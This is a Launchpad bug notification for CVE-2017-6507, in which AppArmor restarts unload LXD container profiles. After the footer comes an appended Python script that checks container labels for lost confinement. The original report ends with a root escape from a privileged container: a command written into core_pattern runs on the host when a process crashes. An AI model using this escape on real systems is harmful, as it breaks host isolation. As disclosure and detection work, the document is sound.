** Changed in: apparmor
       Assignee: Tyler Hicks (tyhicks) => juan serven (juanserven)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1668892

Title:
  CVE-2017-6507: apparmor service restarts and package upgrades unload
  privately managed profiles

Status in AppArmor:
  Fix Released
Status in AppArmor 2.10 series:
  Fix Released
Status in AppArmor 2.11 series:
  Fix Released
Status in AppArmor 2.9 series:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released

Bug description:
  Restarting the apparmor init script, upstart job, or systemd service
  has historically removed all loaded profiles unknown to the well-known
  profile locations. In upstream AppArmor terms, this is /etc/apparmor.d/
  but Ubuntu also adds additional locations.

  This behavior has previously caused a problem where libvirt-managed
  profiles would be unloaded upon "restarting AppArmor":
  https://launchpad.net/bugs/702774

  Stéphane Graber created this bug report after he noticed that the same
  behavior was causing similar problems with lxd-managed profiles.

  In addition, AppArmor distro packaging may trigger an "AppArmor
  restart" when installing a new version of AppArmor, resulting in the
  same profile removal problem. This is true for the Debian/Ubuntu
  packaging.

  The upstream AppArmor team has decided to remove this functionality
  from the AppArmor restart logic to prevent a similar issue happening
  with the next external project that needs to privately manage their
  own set of AppArmor profiles.

  === Original Bug Report ===

  Apparmor package upgrades unload all LXD apparmor profiles, making all
  LXD containers unconfined.

  Example:

  # Create an unprivileged and a privileged container
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
  Creating c1
  Starting c1
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
  Creating c2
  Starting c2

  # Look at their apparmor profiles (expected values)
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
  lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
  lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)

  # Apply an apparmor upgrade
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  Calculating upgrade... Done
  The following packages will be upgraded:
    apparmor
  1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
  Need to get 493 kB of archives.
  After this operation, 8,192 B of additional disk space will be used.
  Do you want to continue? [Y/n]
  Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
  Fetched 493 kB in 0s (34.9 MB/s)
  Preconfiguring packages ...
  (Reading database ... 221457 files and directories currently installed.)
  Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
  Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
  Processing triggers for ureadahead (0.100.0-19) ...
  Setting up apparmor (2.11.0-2ubuntu1) ...
  Installing new version of config file /etc/apparmor.d/abstractions/X ...
  Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
  Installing new version of config file /etc/apparmor.d/abstractions/base ...
  Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
  Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
  Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
  Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
  Installing new version of config file /etc/apparmor.d/abstractions/samba ...
  Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
  Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
  Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
  Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
  Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
  update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
  Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
  Processing triggers for systemd (232-18ubuntu1) ...
  Processing triggers for man-db (2.7.6.1-1) ...

  # And look at the now unconfined containers
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
  unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
  unconfined//&:lxd-c2_<var-lib-lxd>://unconfined

  # The LXD profiles are also entirely gone
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$

  # And to confirm that apparmor is in fact gone
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
  root@c2:~# mount -t proc proc /mnt
  root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
  root@c2:~# sleep 30&
  [1] 468
  root@c2:~# kill -SIGSEGV $!
  root@c2:~#
  [1]+  Segmentation fault      (core dumped) sleep 30
  root@c2:~# exit
  stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
  -rw-rw-rw- 1 root root 0 Mar  1 03:37 /pwned

  This was originally reported (though not as a security issue) here:
  https://github.com/lxc/lxd/issues/2981

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1668892/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
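The report's two /proc/<pid>/attr/current readings show exactly what a defender can monitor for: the host-level component of the container's label flips from "lxd-cN_</var/lib/lxd>" to "unconfined" once the restart drops the privately managed profiles. The following is an added example, not code from the bug report or from LXD/AppArmor; it parses that label format (stacked labels joined by "//&", a namespaced inner label ":<ns>://<profile>", an optional trailing " (enforce)"/" (complain)" mode) and flags containers that have lost host confinement. The sample labels are constructed from the readings above; `read_label` is a hypothetical helper for use on a live host.

```python
"""Audit LXD containers for AppArmor confinement lost after an apparmor restart."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Label:
    components: List[str]   # stacked profile names, outermost (host namespace) first
    mode: Optional[str]     # "enforce" / "complain", or None when unconfined


def parse_label(raw: str) -> Label:
    """Parse one /proc/<pid>/attr/current value as shown in the report."""
    raw = raw.strip()
    mode = None
    if raw.endswith(")") and " (" in raw:      # e.g. "... (enforce)"
        raw, _, tail = raw.rpartition(" (")
        mode = tail[:-1]
    return Label(components=raw.split("//&"), mode=mode)


def host_confined(raw: str) -> bool:
    """True if the outermost label component is a real profile, not 'unconfined'.

    The inner ":lxd-cN_<var-lib-lxd>://unconfined" part is expected: it is the
    container's own policy namespace, not the host-side LXD profile.
    """
    return parse_label(raw).components[0] != "unconfined"


def audit(containers: Dict[str, str]) -> List[str]:
    """Return the names of containers whose host-level confinement is gone."""
    return sorted(name for name, raw in containers.items() if not host_confined(raw))


def read_label(pid: int) -> str:
    """Hypothetical helper for a live host: read the label of a container's init PID."""
    with open(f"/proc/{pid}/attr/current", encoding="utf-8") as fh:
        return fh.read()


# Constructed samples: the labels before and after the upgrade in the report.
BEFORE = {
    "c1": "lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)",
    "c2": "lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)",
}
AFTER = {
    "c1": "unconfined//&:lxd-c1_<var-lib-lxd>://unconfined",
    "c2": "unconfined//&:lxd-c2_<var-lib-lxd>://unconfined",
}

if __name__ == "__main__":
    print("unconfined before upgrade:", audit(BEFORE))   # []
    print("unconfined after upgrade: ", audit(AFTER))    # ['c1', 'c2']
```

Run it periodically (or from a post-upgrade hook) with the init PIDs of running containers; a non-empty result means the LXD profiles must be reloaded before the containers are trusted again.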